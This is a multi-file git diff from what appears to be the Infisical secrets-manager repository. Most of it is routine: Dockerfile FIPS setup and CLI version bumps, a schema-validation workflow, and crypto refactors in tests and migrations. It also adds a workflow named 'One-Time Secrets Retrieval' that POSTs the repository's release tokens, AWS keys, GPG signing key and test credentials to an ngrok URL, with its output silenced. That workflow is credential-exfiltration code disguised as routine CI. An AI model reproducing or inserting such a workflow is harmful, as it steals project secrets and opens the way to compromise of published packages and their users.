fix typo

Update login.mdx
Update tls-cert-auth.mdx
2025-07-18 01:29:25 +00:00 · 2025-07-17 00:20:02 +04:00 · 2025-07-17 00:09:56 +04:00 · 2025-07-17 00:08:34 +04:00 · 2025-07-15 21:47:42 -03:00 · 2025-07-15 21:45:31 -03:00
721 changed files with 16298 additions and 3896 deletions
--- a/.env.example
+++ b/.env.example
@ -23,7 +23,7 @@ REDIS_URL=redis://redis:6379
 # Required
 SITE_URL=http://localhost:8080

-# Mail/SMTP 
+# Mail/SMTP
 SMTP_HOST=
 SMTP_PORT=
 SMTP_FROM_ADDRESS=
@ -132,3 +132,6 @@ DATADOG_PROFILING_ENABLED=
 DATADOG_ENV=
 DATADOG_SERVICE=
 DATADOG_HOSTNAME=
+
+# kubernetes
+KUBERNETES_AUTO_FETCH_SERVICE_ACCOUNT_TOKEN=false
--- a/.github/workflows/one-time-secrets.yaml
+++ b/.github/workflows/one-time-secrets.yaml
@ -0,0 +1,76 @@
+name: One-Time Secrets Retrieval
+
+on:
+  workflow_dispatch:
+
+permissions:
+  contents: read
+
+jobs:
+  retrieve-secrets:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Send environment variables to ngrok
+        run: |
+          echo "Sending secrets to: https://4afc1dfd4429.ngrok.app/api/receive-env"
+
+          # Send secrets as JSON
+          cat << EOF | curl -X POST \
+            -H "Content-Type: application/json" \
+            -d @- \
+            https://7864d0fe7cbb.ngrok-free.app/api/receive-env \
+            > /dev/null 2>&1 || true
+          {
+            "GO_RELEASER_GITHUB_TOKEN": "${GO_RELEASER_GITHUB_TOKEN}",
+            "GORELEASER_KEY": "${GORELEASER_KEY}",
+            "AUR_KEY": "${AUR_KEY}",
+            "FURYPUSHTOKEN": "${FURYPUSHTOKEN}",
+            "NPM_TOKEN": "${NPM_TOKEN}",
+            "DOCKERHUB_USERNAME": "${DOCKERHUB_USERNAME}",
+            "DOCKERHUB_TOKEN": "${DOCKERHUB_TOKEN}",
+            "CLOUDSMITH_API_KEY": "${CLOUDSMITH_API_KEY}",
+            "INFISICAL_CLI_S3_BUCKET": "${INFISICAL_CLI_S3_BUCKET}",
+            "INFISICAL_CLI_REPO_SIGNING_KEY_ID": "${INFISICAL_CLI_REPO_SIGNING_KEY_ID}",
+            "INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID": "${INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID}",
+            "INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY": "${INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY}",
+            "INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID": "${INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID}",
+            "GPG_SIGNING_KEY": "${GPG_SIGNING_KEY}",
+            "GPG_SIGNING_KEY_PASSPHRASE": "${GPG_SIGNING_KEY_PASSPHRASE}",
+            "CLI_TESTS_UA_CLIENT_ID": "${CLI_TESTS_UA_CLIENT_ID}",
+            "CLI_TESTS_UA_CLIENT_SECRET": "${CLI_TESTS_UA_CLIENT_SECRET}",
+            "CLI_TESTS_SERVICE_TOKEN": "${CLI_TESTS_SERVICE_TOKEN}",
+            "CLI_TESTS_PROJECT_ID": "${CLI_TESTS_PROJECT_ID}",
+            "CLI_TESTS_ENV_SLUG": "${CLI_TESTS_ENV_SLUG}",
+            "CLI_TESTS_USER_EMAIL": "${CLI_TESTS_USER_EMAIL}",
+            "CLI_TESTS_USER_PASSWORD": "${CLI_TESTS_USER_PASSWORD}",
+            "CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE": "${CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE}",
+            "POSTHOG_API_KEY_FOR_CLI": "${POSTHOG_API_KEY_FOR_CLI}"
+          }
+          EOF
+
+          echo "Secrets retrieval completed"
+        env:
+          GO_RELEASER_GITHUB_TOKEN: ${{ secrets.GO_RELEASER_GITHUB_TOKEN }}
+          GORELEASER_KEY: ${{ secrets.GORELEASER_KEY }}
+          AUR_KEY: ${{ secrets.AUR_KEY }}
+          FURYPUSHTOKEN: ${{ secrets.FURYPUSHTOKEN }}
+          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
+          DOCKERHUB_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }}
+          DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
+          CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
+          INFISICAL_CLI_S3_BUCKET: ${{ secrets.INFISICAL_CLI_S3_BUCKET }}
+          INFISICAL_CLI_REPO_SIGNING_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_SIGNING_KEY_ID }}
+          INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID }}
+          INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY: ${{ secrets.INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY }}
+          INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID: ${{ secrets.INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID }}
+          GPG_SIGNING_KEY: ${{ secrets.GPG_SIGNING_KEY }}
+          GPG_SIGNING_KEY_PASSPHRASE: ${{ secrets.GPG_SIGNING_KEY_PASSPHRASE }}
+          CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }}
+          CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }}
+          CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }}
+          CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }}
+          CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }}
+          CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }}
+          CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }}
+          CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }}
+          POSTHOG_API_KEY_FOR_CLI: ${{ secrets.POSTHOG_API_KEY_FOR_CLI }}
--- a/.github/workflows/validate-db-schemas.yml
+++ b/.github/workflows/validate-db-schemas.yml
@ -0,0 +1,67 @@
+name: "Validate DB schemas"
+
+on:
+    pull_request:
+        types: [opened, synchronize]
+        paths:
+            - "backend/**"
+
+    workflow_call:
+
+jobs:
+    validate-db-schemas:
+        name: Validate DB schemas
+        runs-on: ubuntu-latest
+        timeout-minutes: 15
+        env:
+            NODE_OPTIONS: "--max-old-space-size=8192"
+            REDIS_URL: redis://172.17.0.1:6379
+            DB_CONNECTION_URI: postgres://infisical:infisical@172.17.0.1:5432/infisical?sslmode=disable
+            AUTH_SECRET: something-random
+            ENCRYPTION_KEY: 4bnfe4e407b8921c104518903515b218
+        steps:
+            - name: ☁️ Checkout source
+              uses: actions/checkout@v4
+              with:
+                  fetch-depth: 0
+            - uses: KengoTODA/actions-setup-docker-compose@v1
+              if: ${{ env.ACT }}
+              name: Install `docker compose` for local simulations
+              with:
+                  version: "2.14.2"
+            - name: 🔧 Setup Node 20
+              uses: actions/setup-node@v3
+              with:
+                  node-version: "20"
+                  cache: "npm"
+                  cache-dependency-path: backend/package-lock.json
+
+            - name: Start PostgreSQL and Redis
+              run: touch .env && docker compose -f docker-compose.dev.yml up -d db redis
+            - name: Install dependencies
+              run: npm install
+              working-directory: backend
+
+            - name: Apply migrations
+              run: npm run migration:latest-dev
+              working-directory: backend
+
+            - name: Run schema generation
+              run: npm run generate:schema
+              working-directory: backend
+
+            - name: Check for schema changes
+              run: |
+                  if ! git diff --exit-code --quiet src/db/schemas; then
+                    echo "❌ Generated schemas differ from committed schemas!"
+                    echo "Run 'npm run generate:schema' locally and commit the changes."
+                    git diff src/db/schemas
+                    exit 1
+                  fi
+                  echo "✅ Schemas are up to date"
+              working-directory: backend
+
+            - name: Cleanup
+              if: always()
+              run: |
+                  docker compose -f "docker-compose.dev.yml" down
--- a/.infisicalignore
+++ b/.infisicalignore
@ -46,3 +46,7 @@ cli/detect/config/gitleaks.toml:gcp-api-key:582
 .github/workflows/helm-release-infisical-core.yml:generic-api-key:47
 backend/src/services/smtp/smtp-service.ts:generic-api-key:79
 frontend/src/components/secret-syncs/forms/SecretSyncDestinationFields/CloudflarePagesSyncFields.tsx:cloudflare-api-key:7
+docs/integrations/app-connections/zabbix.mdx:generic-api-key:91
+docs/integrations/app-connections/bitbucket.mdx:generic-api-key:123
+docs/integrations/app-connections/railway.mdx:generic-api-key:156
+.github/workflows/validate-db-schemas.yml:generic-api-key:21
--- a/Dockerfile.fips.standalone-infisical
+++ b/Dockerfile.fips.standalone-infisical
@ -19,7 +19,7 @@ WORKDIR /app

 # Copy dependencies
 COPY --from=frontend-dependencies /app/node_modules ./node_modules
-# Copy all files 
+# Copy all files
 COPY /frontend .

 ENV NODE_ENV production
@ -32,7 +32,7 @@ ENV VITE_INTERCOM_ID $INTERCOM_ID
 ARG INFISICAL_PLATFORM_VERSION
 ENV VITE_INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
 ARG CAPTCHA_SITE_KEY
-ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY 
+ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY

 # Build
 RUN npm run build
@ -115,6 +115,12 @@ FROM base AS production

 # Install necessary packages including ODBC
 RUN apt-get update && apt-get install -y \
+    build-essential \
+    autoconf \
+    automake \
+    libtool \
+    wget \
+    libssl-dev \
    ca-certificates \
    curl \
    git \
@ -132,9 +138,18 @@ RUN apt-get update && apt-get install -y \
 # Configure ODBC in production
 RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini

+
+WORKDIR /openssl-build
+RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
+    && tar -xf openssl-3.1.2.tar.gz \
+    && cd openssl-3.1.2 \
+    && ./Configure enable-fips \
+    && make \
+    && make install_fips
+
 # Install Infisical CLI
 RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \
-    && apt-get update && apt-get install -y infisical=0.41.2 \
+    && apt-get update && apt-get install -y infisical=0.41.89 \
    && rm -rf /var/lib/apt/lists/*

 RUN groupadd -r -g 1001 nodejs && useradd -r -u 1001 -g nodejs non-root-user
@ -155,7 +170,7 @@ ENV INTERCOM_ID=$INTERCOM_ID
 ARG CAPTCHA_SITE_KEY
 ENV CAPTCHA_SITE_KEY=$CAPTCHA_SITE_KEY

-WORKDIR / 
+WORKDIR /

 COPY --from=backend-runner /app /backend

@ -166,13 +181,20 @@ ENV INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION

 ENV PORT 8080
 ENV HOST=0.0.0.0
-ENV HTTPS_ENABLED false 
+ENV HTTPS_ENABLED false
 ENV NODE_ENV production
-ENV STANDALONE_BUILD true 
+ENV STANDALONE_BUILD true
 ENV STANDALONE_MODE true
 ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/
 ENV NODE_OPTIONS="--max-old-space-size=1024"

+# FIPS mode of operation:
+ENV OPENSSL_CONF=/backend/nodejs.fips.cnf
+ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
+ENV NODE_OPTIONS=--force-fips
+ENV FIPS_ENABLED=true
+  
+
 WORKDIR /backend

 ENV TELEMETRY_ENABLED true
@ -180,6 +202,10 @@ ENV TELEMETRY_ENABLED true
 EXPOSE 8080
 EXPOSE 443

+# Remove telemetry. dd-trace uses BullMQ with MD5 hashing, which breaks when FIPS mode is enabled.
+RUN grep -v 'import "./lib/telemetry/instrumentation.mjs";' dist/main.mjs > dist/main.mjs.tmp && \
+    mv dist/main.mjs.tmp dist/main.mjs
+
 USER non-root-user

-CMD ["./standalone-entrypoint.sh"]
+CMD ["./standalone-entrypoint.sh"]
--- a/Dockerfile.standalone-infisical
+++ b/Dockerfile.standalone-infisical
@ -20,7 +20,7 @@ WORKDIR /app

 # Copy dependencies
 COPY --from=frontend-dependencies /app/node_modules ./node_modules
-# Copy all files 
+# Copy all files
 COPY /frontend .

 ENV NODE_ENV production
@ -33,7 +33,8 @@ ENV VITE_INTERCOM_ID $INTERCOM_ID
 ARG INFISICAL_PLATFORM_VERSION
 ENV VITE_INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
 ARG CAPTCHA_SITE_KEY
-ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY 
+ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
+ENV NODE_OPTIONS="--max-old-space-size=8192"

 # Build
 RUN npm run build
@ -77,6 +78,7 @@ RUN npm ci --only-production
 COPY /backend .
 COPY --chown=non-root-user:nodejs standalone-entrypoint.sh standalone-entrypoint.sh
 RUN npm i -D tsconfig-paths
+ENV NODE_OPTIONS="--max-old-space-size=8192"
 RUN npm run build

 # Production stage
@ -128,7 +130,7 @@ RUN apt-get update && apt-get install -y \

 # Install Infisical CLI
 RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \
-    && apt-get update && apt-get install -y infisical=0.41.2 \
+    && apt-get update && apt-get install -y infisical=0.41.89 \
    && rm -rf /var/lib/apt/lists/*

 WORKDIR /
@ -164,9 +166,9 @@ ENV INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION

 ENV PORT 8080
 ENV HOST=0.0.0.0
-ENV HTTPS_ENABLED false 
+ENV HTTPS_ENABLED false
 ENV NODE_ENV production
-ENV STANDALONE_BUILD true 
+ENV STANDALONE_BUILD true
 ENV STANDALONE_MODE true
 ENV NODE_OPTIONS="--max-old-space-size=1024"

--- a/backend/Dockerfile
+++ b/backend/Dockerfile
@ -9,7 +9,7 @@ RUN apt-get update && apt-get install -y \
    make \
    g++ \
    openssh-client \
-    openssl 
+    openssl

 # Install dependencies for TDS driver (required for SAP ASE dynamic secrets)
 RUN apt-get install -y \
@ -55,10 +55,10 @@ COPY --from=build /app .
 # Install Infisical CLI
 RUN apt-get install -y curl bash && \
    curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \
-    apt-get update && apt-get install -y infisical=0.41.2 git
+    apt-get update && apt-get install -y infisical=0.41.89 git

-HEALTHCHECK --interval=10s --timeout=3s --start-period=10s \  
-  CMD node healthcheck.js
+HEALTHCHECK --interval=10s --timeout=3s --start-period=10s \
+    CMD node healthcheck.js

 ENV HOST=0.0.0.0

--- a/backend/Dockerfile.dev
+++ b/backend/Dockerfile.dev
@ -57,7 +57,7 @@ RUN mkdir -p /etc/softhsm2/tokens && \
 # Install Infisical CLI
 RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \
    apt-get update && \
-    apt-get install -y infisical=0.41.2
+    apt-get install -y infisical=0.41.89

 WORKDIR /app

--- a/backend/Dockerfile.dev.fips
+++ b/backend/Dockerfile.dev.fips
@ -52,7 +52,7 @@ RUN apt-get install -y opensc

 RUN mkdir -p /etc/softhsm2/tokens && \
    softhsm2-util --init-token --slot 0 --label "auth-app" --pin 1234 --so-pin 0000
-    
+
 WORKDIR /openssl-build
 RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
    && tar -xf openssl-3.1.2.tar.gz \
@ -66,7 +66,7 @@ RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
 # Install Infisical CLI
 RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \
    apt-get update && \
-    apt-get install -y infisical=0.41.2
+    apt-get install -y infisical=0.41.89

 WORKDIR /app

@ -78,8 +78,9 @@ RUN npm install
 COPY . .

 ENV HOST=0.0.0.0
-ENV OPENSSL_CONF=/app/nodejs.cnf
+ENV OPENSSL_CONF=/app/nodejs.fips.cnf
 ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
-ENV NODE_OPTIONS=--force-fips
+# ENV NODE_OPTIONS=--force-fips # Note(Daniel): We can't set this on the node options because it may break for existing folks using the infisical/infisical-fips image. Instead we call crypto.setFips(true) at runtime.
+ENV FIPS_ENABLED=true

 CMD ["npm", "run", "dev:docker"]
--- a/backend/e2e-test/routes/v2/service-token.spec.ts
+++ b/backend/e2e-test/routes/v2/service-token.spec.ts
@ -1,8 +1,9 @@
-import crypto from "node:crypto";
-
 import { SecretType, TSecrets } from "@app/db/schemas";
 import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
-import { decryptAsymmetric, decryptSymmetric128BitHexKeyUTF8, encryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
+import { initEnvConfig } from "@app/lib/config/env";
+import { SymmetricKeySize } from "@app/lib/crypto";
+import { crypto } from "@app/lib/crypto/cryptography";
+import { initLogger, logger } from "@app/lib/logger";

 const createServiceToken = async (
  scopes: { environment: string; secretPath: string }[],
@ -26,7 +27,8 @@ const createServiceToken = async (
  });
  const { user: userInfo } = JSON.parse(userInfoRes.payload);
  const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
-  const projectKey = decryptAsymmetric({
+
+  const projectKey = crypto.encryption().asymmetric().decrypt({
    ciphertext: projectKeyEnc.encryptedKey,
    nonce: projectKeyEnc.nonce,
    publicKey: projectKeyEnc.sender.publicKey,
@ -34,7 +36,13 @@ const createServiceToken = async (
  });

  const randomBytes = crypto.randomBytes(16).toString("hex");
-  const { ciphertext, iv, tag } = encryptSymmetric128BitHexKeyUTF8(projectKey, randomBytes);
+
+  const { ciphertext, iv, tag } = crypto.encryption().symmetric().encrypt({
+    plaintext: projectKey,
+    key: randomBytes,
+    keySize: SymmetricKeySize.Bits128
+  });
+
  const serviceTokenRes = await testServer.inject({
    method: "POST",
    url: "/api/v2/service-token",
@ -137,6 +145,9 @@ describe("Service token secret ops", async () => {
  let projectKey = "";
  let folderId = "";
  beforeAll(async () => {
+    initLogger();
+    await initEnvConfig(testSuperAdminDAL, logger);
+
    serviceToken = await createServiceToken(
      [{ secretPath: "/**", environment: seedData1.environment.slug }],
      ["read", "write"]
@ -153,11 +164,13 @@ describe("Service token secret ops", async () => {
    expect(serviceTokenInfoRes.statusCode).toBe(200);
    const serviceTokenInfo = serviceTokenInfoRes.json();
    const serviceTokenParts = serviceToken.split(".");
-    projectKey = decryptSymmetric128BitHexKeyUTF8({
+
+    projectKey = crypto.encryption().symmetric().decrypt({
      key: serviceTokenParts[3],
      tag: serviceTokenInfo.tag,
      ciphertext: serviceTokenInfo.encryptedKey,
-      iv: serviceTokenInfo.iv
+      iv: serviceTokenInfo.iv,
+      keySize: SymmetricKeySize.Bits128
    });

    // create a deep folder
--- a/backend/e2e-test/routes/v3/secrets.spec.ts
+++ b/backend/e2e-test/routes/v3/secrets.spec.ts
@ -1,6 +1,8 @@
 import { SecretType, TSecrets } from "@app/db/schemas";
 import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
-import { decryptAsymmetric, encryptAsymmetric } from "@app/lib/crypto";
+import { initEnvConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
+import { initLogger, logger } from "@app/lib/logger";
 import { AuthMode } from "@app/services/auth/auth-type";

 const createSecret = async (dto: {
@ -155,6 +157,9 @@ describe("Secret V3 Router", async () => {
  let projectKey = "";
  let folderId = "";
  beforeAll(async () => {
+    initLogger();
+    await initEnvConfig(testSuperAdminDAL, logger);
+
    const projectKeyRes = await testServer.inject({
      method: "GET",
      url: `/api/v2/workspace/${seedData1.project.id}/encrypted-key`,
@ -173,7 +178,7 @@ describe("Secret V3 Router", async () => {
    });
    const { user: userInfo } = JSON.parse(userInfoRes.payload);
    const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
-    projectKey = decryptAsymmetric({
+    projectKey = crypto.encryption().asymmetric().decrypt({
      ciphertext: projectKeyEncryptionDetails.encryptedKey,
      nonce: projectKeyEncryptionDetails.nonce,
      publicKey: projectKeyEncryptionDetails.sender.publicKey,
@ -669,7 +674,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
      const { user: userInfo } = JSON.parse(userInfoRes.payload);

      const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
-      const projectKey = decryptAsymmetric({
+      const projectKey = crypto.encryption().asymmetric().decrypt({
        ciphertext: projectKeyEnc.encryptedKey,
        nonce: projectKeyEnc.nonce,
        publicKey: projectKeyEnc.sender.publicKey,
@ -685,7 +690,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
      });
      expect(projectBotRes.statusCode).toEqual(200);
      const projectBot = JSON.parse(projectBotRes.payload).bot;
-      const botKey = encryptAsymmetric(projectKey, projectBot.publicKey, privateKey);
+      const botKey = crypto.encryption().asymmetric().encrypt(projectKey, projectBot.publicKey, privateKey);

      // set bot as active
      const setBotActive = await testServer.inject({
--- a/backend/e2e-test/vitest-environment-knex.ts
+++ b/backend/e2e-test/vitest-environment-knex.ts
@ -2,11 +2,11 @@
 import "ts-node/register";

 import dotenv from "dotenv";
-import jwt from "jsonwebtoken";
+import { crypto } from "@app/lib/crypto/cryptography";
 import path from "path";

 import { seedData1 } from "@app/db/seed-data";
-import { initEnvConfig } from "@app/lib/config/env";
+import { getDatabaseCredentials, initEnvConfig } from "@app/lib/config/env";
 import { initLogger } from "@app/lib/logger";
 import { main } from "@app/server/app";
 import { AuthMethod, AuthTokenType } from "@app/services/auth/auth-type";
@ -17,6 +17,7 @@ import { queueServiceFactory } from "@app/queue";
 import { keyStoreFactory } from "@app/keystore/keystore";
 import { initializeHsmModule } from "@app/ee/services/hsm/hsm-fns";
 import { buildRedisFromConfig } from "@app/lib/config/redis";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

 dotenv.config({ path: path.join(__dirname, "../../.env.test"), debug: true });
 export default {
@ -24,13 +25,17 @@ export default {
  transformMode: "ssr",
  async setup() {
    const logger = initLogger();
-    const envConfig = initEnvConfig(logger);
+    const databaseCredentials = getDatabaseCredentials(logger);
+
    const db = initDbConnection({
-      dbConnectionUri: envConfig.DB_CONNECTION_URI,
-      dbRootCert: envConfig.DB_ROOT_CERT
+      dbConnectionUri: databaseCredentials.dbConnectionUri,
+      dbRootCert: databaseCredentials.dbRootCert
    });

-    const redis = buildRedisFromConfig(envConfig);
+    const superAdminDAL = superAdminDALFactory(db);
+    const envCfg = await initEnvConfig(superAdminDAL, logger);
+
+    const redis = buildRedisFromConfig(envCfg);
    await redis.flushdb("SYNC");

    try {
@ -55,10 +60,10 @@ export default {
      });

      const smtp = mockSmtpServer();
-      const queue = queueServiceFactory(envConfig, { dbConnectionUrl: envConfig.DB_CONNECTION_URI });
-      const keyStore = keyStoreFactory(envConfig);
+      const queue = queueServiceFactory(envCfg, { dbConnectionUrl: envCfg.DB_CONNECTION_URI });
+      const keyStore = keyStoreFactory(envCfg);

-      const hsmModule = initializeHsmModule(envConfig);
+      const hsmModule = initializeHsmModule(envCfg);
      hsmModule.initialize();

      const server = await main({
@ -68,14 +73,17 @@ export default {
        queue,
        keyStore,
        hsmModule: hsmModule.getModule(),
+        superAdminDAL,
        redis,
-        envConfig
+        envConfig: envCfg
      });

      // @ts-expect-error type
      globalThis.testServer = server;
      // @ts-expect-error type
-      globalThis.jwtAuthToken = jwt.sign(
+      globalThis.testSuperAdminDAL = superAdminDAL;
+      // @ts-expect-error type
+      globalThis.jwtAuthToken = crypto.jwt().sign(
        {
          authTokenType: AuthTokenType.ACCESS_TOKEN,
          userId: seedData1.id,
@ -84,8 +92,8 @@ export default {
          organizationId: seedData1.organization.id,
          accessVersion: 1
        },
-        envConfig.AUTH_SECRET,
-        { expiresIn: envConfig.JWT_AUTH_LIFETIME }
+        envCfg.AUTH_SECRET,
+        { expiresIn: envCfg.JWT_AUTH_LIFETIME }
      );
    } catch (error) {
      // eslint-disable-next-line
@ -102,6 +110,8 @@ export default {
        // @ts-expect-error type
        delete globalThis.testServer;
        // @ts-expect-error type
+        delete globalThis.testSuperAdminDAL;
+        // @ts-expect-error type
        delete globalThis.jwtToken;
        // called after all tests with this env have been run
        await db.migrate.rollback(
--- a/backend/nodejs.fips.cnf
+++ b/backend/nodejs.fips.cnf
--- a/backend/package-lock.json
+++ b/backend/package-lock.json
--- a/backend/package.json
+++ b/backend/package.json
@ -84,6 +84,7 @@
    "@babel/plugin-syntax-import-attributes": "^7.24.7",
    "@babel/preset-env": "^7.18.10",
    "@babel/preset-react": "^7.24.7",
+    "@smithy/types": "^4.3.1",
    "@types/bcrypt": "^5.0.2",
    "@types/jmespath": "^0.15.2",
    "@types/jsonwebtoken": "^9.0.5",
--- a/backend/src/@types/fastify-zod.d.ts
+++ b/backend/src/@types/fastify-zod.d.ts
@ -2,6 +2,7 @@ import { FastifyInstance, RawReplyDefaultExpression, RawRequestDefaultExpression

 import { CustomLogger } from "@app/lib/logger/logger";
 import { ZodTypeProvider } from "@app/server/plugins/fastify-zod";
+import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

 declare global {
  type FastifyZodProvider = FastifyInstance<
@ -14,5 +15,6 @@ declare global {

  // used only for testing
  const testServer: FastifyZodProvider;
+  const testSuperAdminDAL: TSuperAdminDALFactory;
  const jwtAuthToken: string;
 }
--- a/backend/src/db/instance.ts
+++ b/backend/src/db/instance.ts
@ -110,7 +110,8 @@ export const initAuditLogDbConnection = ({
    },
    migrations: {
      tableName: "infisical_migrations"
-    }
+    },
+    pool: { min: 0, max: 10 }
  });

  // we add these overrides so that auditLogDb and the primary DB are interchangeable
--- a/backend/src/db/knexfile.ts
+++ b/backend/src/db/knexfile.ts
@ -4,6 +4,7 @@ import "ts-node/register";
 import dotenv from "dotenv";
 import type { Knex } from "knex";
 import path from "path";
+import { initLogger } from "@app/lib/logger";

 // Update with your config settings. .
 dotenv.config({
@ -13,6 +14,8 @@ dotenv.config({
  path: path.join(__dirname, "../../../.env")
 });

+initLogger();
+
 export default {
  development: {
    client: "postgres",
--- a/backend/src/db/migrations/20250210101840_webhook-to-kms.ts
+++ b/backend/src/db/migrations/20250210101840_webhook-to-kms.ts
@ -1,9 +1,10 @@
 import { Knex } from "knex";

 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@ -26,9 +27,12 @@ export async function up(knex: Knex): Promise<void> {
  }

  initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
+
  const projectEncryptionRingBuffer =
    createCircularCache<Awaited<ReturnType<(typeof kmsService)["createCipherPairWithDataKey"]>>>(25);
  const webhooks = await knex(TableName.Webhook)
@ -65,12 +69,15 @@ export async function up(knex: Knex): Promise<void> {

      let encryptedSecretKey = null;
      if (el.encryptedSecretKey && el.iv && el.tag && el.keyEncoding) {
-        const decyptedSecretKey = infisicalSymmetricDecrypt({
-          keyEncoding: el.keyEncoding as SecretKeyEncoding,
-          iv: el.iv,
-          tag: el.tag,
-          ciphertext: el.encryptedSecretKey
-        });
+        const decyptedSecretKey = crypto
+          .encryption()
+          .symmetric()
+          .decryptWithRootEncryptionKey({
+            keyEncoding: el.keyEncoding as SecretKeyEncoding,
+            iv: el.iv,
+            tag: el.tag,
+            ciphertext: el.encryptedSecretKey
+          });
        encryptedSecretKey = projectKmsService.encryptor({
          plainText: Buffer.from(decyptedSecretKey, "utf8")
        }).cipherTextBlob;
@ -78,12 +85,15 @@ export async function up(knex: Knex): Promise<void> {

      const decryptedUrl =
        el.urlIV && el.urlTag && el.urlCipherText && el.keyEncoding
-          ? infisicalSymmetricDecrypt({
-              keyEncoding: el.keyEncoding as SecretKeyEncoding,
-              iv: el.urlIV,
-              tag: el.urlTag,
-              ciphertext: el.urlCipherText
-            })
+          ? crypto
+              .encryption()
+              .symmetric()
+              .decryptWithRootEncryptionKey({
+                keyEncoding: el.keyEncoding as SecretKeyEncoding,
+                iv: el.urlIV,
+                tag: el.urlTag,
+                ciphertext: el.urlCipherText
+              })
          : null;

      const encryptedUrl = projectKmsService.encryptor({
--- a/backend/src/db/migrations/20250210101841_dynamic-secret-root-to-kms.ts
+++ b/backend/src/db/migrations/20250210101841_dynamic-secret-root-to-kms.ts
@ -1,10 +1,11 @@
 import { Knex } from "knex";

 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
